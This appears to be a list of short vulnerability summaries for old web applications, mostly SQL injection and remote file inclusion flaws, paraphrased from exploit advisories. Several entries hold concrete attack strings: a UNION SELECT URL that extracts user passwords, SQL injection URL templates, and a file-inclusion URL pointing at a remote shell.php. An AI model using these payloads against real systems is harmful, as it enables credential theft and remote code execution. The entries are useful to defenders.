AlstraSoft Efriends 4.85 is vulnerable to a remote command execution vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This request contains a malicious command which is executed on the server. This exploit was coded by Kw3[R]Ln from Romanian Security Team a.K.A http://RST-CREW.NET.
CMtextS version 1.0 is vulnerable to a password disclosure vulnerability. An attacker can access the admin.txt file located in the users_logins directory to view the admin password. The admin password is stored in plaintext in the admin.txt file.
An attacker can exploit this vulnerability by sending a specially crafted SQL query to the vulnerable parameter 'ProductID' in the 'Review.asp' page. This will allow the attacker to gain access to the database and extract sensitive information such as customer emails and passwords.
An attacker can exploit this vulnerability by sending a malicious SQL query to the ArticlesTableview.asp page. The attacker can use the 'key' parameter to inject arbitrary SQL code. For example, an attacker can use the following URL to inject malicious SQL code: http://[target]/[path]/ArticlesTableview.asp?key='[SQL HERE]. The attacker can also use the 'userid' parameter to change the user ID in the query. For example, ArticlesTableview.asp?key=-1%20union%20select%200,0,0,0,userpassword,username,0,0,0,0,0,0,0,0%20from%20articlesusers%20where%20userid=18
The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'key' parameter to '/faqview.asp' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in application's database. Successful exploitation of this vulnerability may allow an attacker to gain access to sensitive information from the database, including passwords and other sensitive data.
A remote SQL injection vulnerability exists in Q-Shop v3.5. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This request contains malicious SQL statements that are executed in the backend database. An example of such a request is http://[target]/[path]/browse.asp?cat=42&ManuID=&OrderBy=[SQL HERE], where [SQL HERE] is the malicious SQL statement.
Discovered by Timq, a vulnerable code require $abspath."/functions.php"; can be exploited by sending a malicious URL http://site.com/[dir]/header.php?abspath=http://site.com/shell.php? to the target server.
A vulnerability exists in guanxiCRM version v0.9.1, which allows a remote attacker to include a file from a remote host. The vulnerability is due to the 'rootpath' parameter in the 'include/phpxd/phpXD.php' script not properly sanitizing user-supplied input. An attacker can exploit this vulnerability to include arbitrary files from remote hosts, which can lead to the execution of arbitrary code on the vulnerable system.
Mambo com_registration_detailed version 4.1 and below is vulnerable to a Remote File Inclusion vulnerability. The vulnerability exists due to insufficient sanitization of user-supplied input in the '$_REGISTER_DETAILS_LANGUAGE' parameter of the 'registration_detailed.inc.php' script. An attacker can exploit this vulnerability to execute arbitrary PHP code on the vulnerable system by supplying a malicious URL in the '$mosConfig_absolute_path' parameter of the vulnerable script.
This exploit allows an attacker to gain access to the admin panel of Gnu turk all versions by exploiting a blind SQL injection vulnerability. The attacker can use the exploit to get the admin username and password without the need of a hash.
Services By CQR